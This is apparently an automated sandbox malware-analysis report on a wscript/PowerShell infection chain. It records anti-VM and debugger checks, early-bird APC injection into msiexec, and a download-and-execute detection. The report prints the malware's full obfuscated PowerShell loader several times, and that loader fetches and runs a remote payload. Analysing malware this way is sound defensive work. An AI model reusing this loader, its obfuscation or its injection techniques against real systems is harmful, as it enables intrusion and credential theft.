nFPvYDRv66d0b+undG/rp3Rv66d0b+undG9okjCGAWOSiVbOHISeNPVGYLHBleIbZH9z5XOqDq5ttqyUT/LqfXhwFCuJ9Ia8mlcjSZJysqRdo/PbpG4Q1boiwhcPsZk1PY3Fk7Rn66YulZLvKtXsHmmtW41ztTjaChXsHPifP1I6HcwrcKGfQFmL5USGH+6xrXxZ1AZEGclj6Y3TWcXYief3LDt4aw50ge5cfH2ShbSFFrFc8htYJXN16SlrAex87zXedXPV9f+TUqXVU+PPaQH1/H6wV9eZwuomuy813jVGFFw1OHuA8cdcCDlAh3O70zOPVqYO0OgK/pYPSmgRWk4/QsoyiXEmSPnsQXRv66dKfcH/ZG6O3tXocSQx99S7uG/rp3Rv66d0b+undG/rp3Rv66d0bxbbtsqBVNltgR3T3cU1L+7Psb5rOzYnchZQRW8xW6FWnIh5C0Jx6SP9YtF4vEwCrI8LdImrQEgxXDP7HQoto5oWtTrB7xfn/4D1qmtbN6B3xHFSeDOjdG3MRjZB/H9wb+ubcA3Dp3Rv66d0b+undG/rp3Rv66d0b+unifmRPvZ6+MtajNV0qJKXuQWaeu2dhd6k0mggD+C5gaC+LU5yuS2ZgPRrqdFjjheTDGqdurLXHt/rMUp2Cy5nNsjtrh1Ncr9vJcLxoDAaz0AdDexcbcreqh0lA3TOvyWgvPQs9DpoQEbGoAmgvlsZFOpLoJzcxCj1lZuVNvwll/UOZxoUhjkNr4nDar/STuoL3kT1X
Source: wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: wscript.exe, 00000000.00000003.1354500084.0000023D97861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.1356378419.0000023D97867000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1354005111.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1344006015.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354712379.0000023D97873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354433204.0000023D97872000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343400870.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343793550.0000023D9784B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356419474.0000023D97873000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000005009000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhv528A.tmp.11.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemFRONTDESK-PCvmicshutdown
Source: powershell.exe, 00000002.00000002.1531059954.000001C4FCFD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCe}
Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04C28860 LdrInitializeThunk, 4_2_04C28860
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_209060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_209060E2
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 11_2_004044A4
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20904AB4 mov eax, dword ptr fs:[00000030h] 7_2_20904AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_2090724E GetProcessHeap, 7_2_2090724E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_209060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_209060E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20902639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_20902639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20902B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_20902B1C

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7540.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#rastafarian reservoiret spermatophobia zwitterions nonevading paragraferes #>;$forjttelserne='horsehair';<#humeral grainier embathe agaty #>;$maksimale188=$genanvendelsesprocessernconsumably+$host.ui; function adiabaticlly($megafonens){if ($maksimale188) {$mahajan++;}$minim=$genanvendelsesprocesserntolerability+$megafonens.'length'-$mahajan; for( $genanvendelsesprocesser=3;$genanvendelsesprocesser -lt $minim;$genanvendelsesprocesser+=4){$farings=$genanvendelsesprocesser;$alma+=$megafonens[$genanvendelsesprocesser];$erantissenes='nemhed';}$alma;}function vandende($feriers){ .($bibliografisk) ($feriers);}$mealymouthedness=adiabaticlly 'in msliorebzvani ndlpyrlfulaeni/sco ';$mealymouthedness+=adiabaticlly 'fli5udk.con0nel stu(devwb gi den rodskroampw tos po re ntiltuge i l1 li0.ha. la0 ,i;ann drywti ib.onund6ham4aff;oxy satxund6 gi4ung;dam misrdiavsva:the1tia3,ou1inf.til0t t)ma. bhigsidesamcrefk fiofa,/ vi2 ge0for1s,o0fll0 pe1oft0 b1 i stef oicherstieshaftv.oflyx .t/cen1 b 3 co1s m.t.l0uds ';$verdeners=adiabaticlly 'se u ass b eti,r an-junaforg evetrsndept to ';$belard=adiabaticlly ' udhnint a.tli pidis o:st /alg/undsovefwor4 o l sp.jacsserhbaaoingpbr./ muz brwdy ab lb p,mf drud,m tupind/ kodi ficyswkria ,rnb sige,.sacpbeif dabudt ';$preindisposition=adiabaticlly 'p,e>neu ';$bibliografisk=adiabaticlly 'c ii .neaurxvel ';$formaalene='celiectomy';$ujordiskes='\taxlessly199.cho';vandende (adiabaticlly 'alp$braghiel llo h bsidamyclopl:perre eeselfjanrlucaun carstparofo mwh egent,asrbulyhs 1pos8 un8,ne= no$ eneunvncrivom : ffaekip php odmetas itdisa la+sy $ u ucatjjouog,irfordoveinedswrykkeeefedssmi ');vandende (adiabaticlly ' h $ rgs,il svo onbtila .ala.d:.hafordo,lerrbes ork dn kvi,ngnansgopksa troxfeskos daudorla.kt nta titboue fyrudksdel=try$ .nbf rerholeddadirr,andhol.surspo pgull ori ent pe(t n$ exp er.rne .ti unnsepd lii lestr.p fsosynsto ilikthosikl,otrinsv )dul ');vandende (adiabaticlly 'gen[klunlileswati s. nsf oeimprshav oitrfchanec,up epoat isignkurt semyasa ron t asilgvalesilrgra]fus:fam:ab srepeka,cstaukn rinoizootludypatpstorps.o frtdeaozencsologr ldre evi=s b utu[.urnfodedantsan.lumss ae securiuspar r iunjt dykdep,dorpaaoliltunco,ubc saofaclr,gt nyankpskueafs]erk:abo:d atsk lgurssty1ran2sle ');$belard=$forskningsresultaters[0];$estimeringens=(adiabaticlly '.nd$ bagd slsanoskrbantaextltol:sknmindael ub rnaled xpeho,rvej=cornremevecwbu - akointb injtaneskic eatrep hiss opyln sunrtrefeattmodo.undnbese aft er. enwforeungb omcs,uluncivu edolnmodtgen ');vandende ($estimeringens);vandende (adiabaticlly 'zak$usamanrafodu fonim,dil eforrind.vaahf.oe llatild unesymrbeestyr[ .t$ hav meo trtrad nesa n ape leroffsrec]k r=har$insm sse rabanlregy l minjo spu latmish arega df undele gjs bas ,h ');$oxyhematin=adiabaticlly 'ava$unombluaevnu pn fudfeleforrt n. undstyobrnw,izn sklu,wovkka hydchof.rviba.lskaerig(she$vejbunq Jump to behavior
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageru
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerV
Source: msiexec.exe, 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20902933 cpuid 7_2_20902933
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
